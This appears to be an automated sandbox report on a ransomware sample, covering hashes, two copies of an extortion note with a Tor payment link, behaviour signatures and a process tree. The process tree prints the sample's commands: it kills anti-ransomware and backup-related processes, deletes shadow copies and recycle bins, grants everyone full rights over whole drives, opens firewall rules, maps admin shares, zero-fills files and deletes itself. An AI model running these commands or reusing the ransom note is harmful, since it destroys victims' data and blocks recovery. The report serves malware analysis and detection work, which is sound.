Analysis
-
max time kernel
115s -
max time network
56s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
28-05-2021 09:57
General
-
Target
e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
-
Size
290KB
-
MD5
a6dcf23059f6e61fa683907c47baf73e
-
SHA1
1d55396b26d97b18256513607dcbe3f308569d5b
-
SHA256
e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3
-
SHA512
72ef9997b814807e677e7861a94de3c8c2b7cb350ab79c887de61f505f23ebc2e3db177b34e86f1dedb3017f468e5c6c0f34d188c574e4cbe20410ff1bf596f7
Score
10/10
Malware Config
Extracted
Path
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
Ransom Note
YOUR COMPANY NETWORK HAS BEEN HACKED
All your important files have been encrypted!
Your files are safe! Only modified.(AES)
No software available on internet can help you.
We are the only ones able to decrypt your files.
--------------------------------------------------------------------------------
We also gathered highly confidential/personal data.
These data are currently stored on a private server.
Files are also encrypted and stored securely.
--------------------------------------------------------------------------------
As a result of working with us, you will receive:
Fully automatic decryptor, all your data will be recovered within a few hours after it's run.
Server with your data will be immediately destroyed after your payment.
Save time and continue working.
You will can send us 2-3 non-important files and we will decrypt it
for free to prove we are able to give your files back.
--------------------------------------------------------------------------------
!!!!!!!!!!!!!!!!!!!!!!!!
If you decide not to work with us:
All data on your computers will remain encrypted forever.
YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!
So you can expect your data to be publicly available in the near future..
The price will increase over time.
!!!!!!!!!!!!!!!!!!!!!!!!!
--------------------------------------------------------------------------------
It doesn't matter to us what you choose.
We only seek money and our goal is not to damage your reputation or prevent your business from running.
Write to us now and we will provide the best prices.
Instructions for contacting us:
1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site.
2. Press "Download Tor", then press "Download Tor Browser Bundle", install it.
3. Open the Tor browser. Copy the link http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD and paste it in the Tor browser.
7. Start a chat and follow the further instructions.
Attention!
Any attempt to restore your files with third-party software will corrupt it.
Modify or rename files will result in a loose of data.
If you decide to try anyway, make copies before that
Key Identifier:
OP410sm/Zu/hwIaK+r04opH63hmJ6HYEJ3vx14YZ3Xrdmvn9PUkLTUIBcLi1fPBhnKuX2wZmofEzPpHZKxo5GzMml88FOa3FwAoY4JK8KvlC2Lge4NYk0rmrSTYspFXUHLkhA3scXzyu9C0Qb8EnHW6TvFX7zkyuQ8b4vfbSER4rKxcx9DTPJByns6ju7+Rme//9I3UKR58o0w9L9JnudfnAyupCiGR0pqIFbtsxIWmPmepLhuOaootyhYF5GQ0gUbZdE9WjIcHJs4wVW7f2h2GDN9F0KPQtnMxK6bsCxubXNFq0osz/6XgqkdZF21YyxqR3Wvi3LO0189yHoebhRgIo8W1K2SO1J3oM5vikUDxZvR03dxVm+6OkEn8dcI9tcjjCyv2V5ENJ35dn2FUoXn29GomorLuEAmI8yTQ+ZwFBPr3p9Fu1PVY1vqMOUtfR4qPUeESQTvP8rDSqR+44bB1aM2UQsS1v7iGQ27OXW9WOpV0jY0nl+wSKbsVWfUn9wGulDvgMgMYiPZyWPPfYFf0yYN3gsKPgqQBENVjXTFIZ6uzvEdok6WJBMwZ9o9BOUNNXu8RUUw1hMX8UE48vXpEVA5zv6ySGWQAQhzljrShrFDbqcAmya1/Tu4bqPDt4h22/yC0m1jOM4UKIiREeDyZLC/Ir7623L5McbR32dRM=
URLs
http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD
Extracted
Path
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
Ransom Note
YOUR COMPANY NETWORK HAS BEEN HACKED
All your important files have been encrypted!
Your files are safe! Only modified.(AES)
No software available on internet can help you.
We are the only ones able to decrypt your files.
We also gathered highly confidential/personal data.
These data are currently stored on a private server.
Files are also encrypted and stored securely.
As a result of working with us, you will receive:
Fully automatic decryptor, all your data will be recovered within a few hours after it’s installation.
Server with your data will be immediately destroyed after your payment.
Save time and continue working.
You will can send us 2-3 non-important files and we will decrypt it
for free to prove we are able to give your files back.
If you decide not to work with us:
All data on your computers will remain encrypted forever.
YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!
So you can expect your data to be publicly available in the near future..
The price will increase over time.
It doesn't matter to us what you choose.
We only seek money and our goal is not to damage your reputation or prevent your business from running.
Write to us now and we will provide the best prices.
Instructions for contacting us:
1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site.
2. Press "Download Tor", then press "Download Tor Browser Bundle", install it.
3. Open the Tor browser. Copy the link http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD and paste it in the Tor browser.
7. Start a chat and follow the further instructions.
Attention!
Any attempt to restore your files with third-party software will corrupt it.
Modify or rename files will result in a loose of data.
If you decide to try anyway, make copies before that
Key Identifier: OP410sm/Zu/hwIaK+r04opH63hmJ6HYEJ3vx14YZ3Xrdmvn9PUkLTUIBcLi1fPBhnKuX2wZmofEzPpHZKxo5GzMml88FOa3FwAoY4JK8KvlC2Lge4NYk0rmrSTYspFXUHLkhA3scXzyu9C0Qb8EnHW6TvFX7zkyuQ8b4vfbSER4rKxcx9DTPJByns6ju7+Rme//9I3UKR58o0w9L9JnudfnAyupCiGR0pqIFbtsxIWmPmepLhuOaootyhYF5GQ0gUbZdE9WjIcHJs4wVW7f2h2GDN9F0KPQtnMxK6bsCxubXNFq0osz/6XgqkdZF21YyxqR3Wvi3LO0189yHoebhRgIo8W1K2SO1J3oM5vikUDxZvR03dxVm+6OkEn8dcI9tcjjCyv2V5ENJ35dn2FUoXn29GomorLuEAmI8yTQ+ZwFBPr3p9Fu1PVY1vqMOUtfR4qPUeESQTvP8rDSqR+44bB1aM2UQsS1v7iGQ27OXW9WOpV0jY0nl+wSKbsVWfUn9wGulDvgMgMYiPZyWPPfYFf0yYN3gsKPgqQBENVjXTFIZ6uzvEdok6WJBMwZ9o9BOUNNXu8RUUw1hMX8UE48vXpEVA5zv6ySGWQAQhzljrShrFDbqcAmya1/Tu4bqPDt4h22/yC0m1jOM4UKIiREeDyZLC/Ir7623L5McbR32dRM=
URLs
http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD
Signatures
-
Modifies Windows Firewall 1 TTPs
-
Drops startup file 1 IoCs
-
Modifies file permissions 1 TTPs 3 IoCs
-
Modifies WinLogon 2 TTPs 2 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 48 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 49 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 4 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe"1⤵
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵
-
C:\Windows\SYSTEM32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config Dnscache start= auto2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config FDResPub start= auto2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config upnphost start= auto2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\Users2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\A$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\B$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\C$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\D$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\E$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\F$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\G$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\H$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\I$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\J$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\K$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\L$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\M$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\N$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\O$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\P$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\Q$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\R$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\S$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\T$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\U$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\V$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\W$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\X$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\Y$2⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.13\Z$2⤵
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta2⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe2⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.htaMD5
29d4c70a2e9f4537c7548e41e2f77125
SHA180bf45841711606a484599a9a507587fa1139ea2
SHA256b6d3aa1e9bf894af5a8be6c1ea60d54ce4c430c635c2abde5ac03af101f26c62
SHA512a0b49e3c08ae534a04af8adcdfb28296001dc53ed24d4a5dee2d62b0ff02c0a2dba1f147316bc4d6a1581f6d37b8363100179606b3c2481986ecc841f73a93b8
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/200-147-0x0000000000000000-mapping.dmp
-
memory/208-129-0x0000000000000000-mapping.dmp
-
memory/412-135-0x0000000000000000-mapping.dmp
-
memory/412-170-0x0000000000000000-mapping.dmp
-
memory/416-165-0x0000000000000000-mapping.dmp
-
memory/416-143-0x0000000000000000-mapping.dmp
-
memory/492-169-0x0000000000000000-mapping.dmp
-
memory/492-127-0x0000000000000000-mapping.dmp
-
memory/580-157-0x0000000000000000-mapping.dmp
-
memory/736-136-0x0000000000000000-mapping.dmp
-
memory/736-174-0x0000000000000000-mapping.dmp
-
memory/748-172-0x0000000000000000-mapping.dmp
-
memory/768-144-0x0000000000000000-mapping.dmp
-
memory/852-114-0x0000000000580000-0x0000000000581000-memory.dmpFilesize
4KB
-
memory/852-116-0x000000001B220000-0x000000001B222000-memory.dmpFilesize
8KB
-
memory/1116-123-0x0000000000000000-mapping.dmp
-
memory/1152-179-0x0000000000000000-mapping.dmp
-
memory/1156-133-0x0000000000000000-mapping.dmp
-
memory/1156-156-0x0000000000000000-mapping.dmp
-
memory/1248-118-0x0000000000000000-mapping.dmp
-
memory/1272-177-0x0000000000000000-mapping.dmp
-
memory/1368-178-0x0000000000000000-mapping.dmp
-
memory/1448-120-0x0000000000000000-mapping.dmp
-
memory/1544-141-0x0000000000000000-mapping.dmp
-
memory/1544-154-0x0000000000000000-mapping.dmp
-
memory/1560-122-0x0000000000000000-mapping.dmp
-
memory/1768-176-0x0000000000000000-mapping.dmp
-
memory/1820-142-0x0000000000000000-mapping.dmp
-
memory/1856-175-0x0000000000000000-mapping.dmp
-
memory/1984-137-0x0000000000000000-mapping.dmp
-
memory/2084-148-0x0000000000000000-mapping.dmp
-
memory/2120-167-0x0000000000000000-mapping.dmp
-
memory/2148-132-0x0000000000000000-mapping.dmp
-
memory/2148-168-0x0000000000000000-mapping.dmp
-
memory/2152-152-0x0000000000000000-mapping.dmp
-
memory/2176-124-0x0000000000000000-mapping.dmp
-
memory/2192-162-0x0000000000000000-mapping.dmp
-
memory/2264-161-0x0000000000000000-mapping.dmp
-
memory/2264-180-0x0000000000000000-mapping.dmp
-
memory/2280-164-0x0000000000000000-mapping.dmp
-
memory/2308-131-0x0000000000000000-mapping.dmp
-
memory/2336-149-0x0000000000000000-mapping.dmp
-
memory/2340-134-0x0000000000000000-mapping.dmp
-
memory/2368-145-0x0000000000000000-mapping.dmp
-
memory/2368-166-0x0000000000000000-mapping.dmp
-
memory/2648-140-0x0000000000000000-mapping.dmp
-
memory/2692-150-0x0000000000000000-mapping.dmp
-
memory/2792-121-0x0000000000000000-mapping.dmp
-
memory/2976-153-0x0000000000000000-mapping.dmp
-
memory/3172-128-0x0000000000000000-mapping.dmp
-
memory/3260-117-0x0000000000000000-mapping.dmp
-
memory/3344-119-0x0000000000000000-mapping.dmp
-
memory/3376-171-0x0000000000000000-mapping.dmp
-
memory/3380-151-0x0000000000000000-mapping.dmp
-
memory/3572-139-0x0000000000000000-mapping.dmp
-
memory/3572-173-0x0000000000000000-mapping.dmp
-
memory/3620-146-0x0000000000000000-mapping.dmp
-
memory/3840-205-0x0000012A4DC56000-0x0000012A4DC58000-memory.dmpFilesize
8KB
-
memory/3840-191-0x0000012A4DB70000-0x0000012A4DB71000-memory.dmpFilesize
4KB
-
memory/3840-186-0x0000012A354C0000-0x0000012A354C1000-memory.dmpFilesize
4KB
-
memory/3840-196-0x0000012A4DC50000-0x0000012A4DC52000-memory.dmpFilesize
8KB
-
memory/3840-158-0x0000000000000000-mapping.dmp
-
memory/3840-199-0x0000012A4DC53000-0x0000012A4DC55000-memory.dmpFilesize
8KB
-
memory/3860-125-0x0000000000000000-mapping.dmp
-
memory/3864-138-0x0000000000000000-mapping.dmp
-
memory/3864-155-0x0000000000000000-mapping.dmp
-
memory/3908-163-0x0000000000000000-mapping.dmp
-
memory/3940-160-0x0000000000000000-mapping.dmp
-
memory/4044-130-0x0000000000000000-mapping.dmp
-
memory/4056-126-0x0000000000000000-mapping.dmp
-
memory/4084-159-0x0000000000000000-mapping.dmp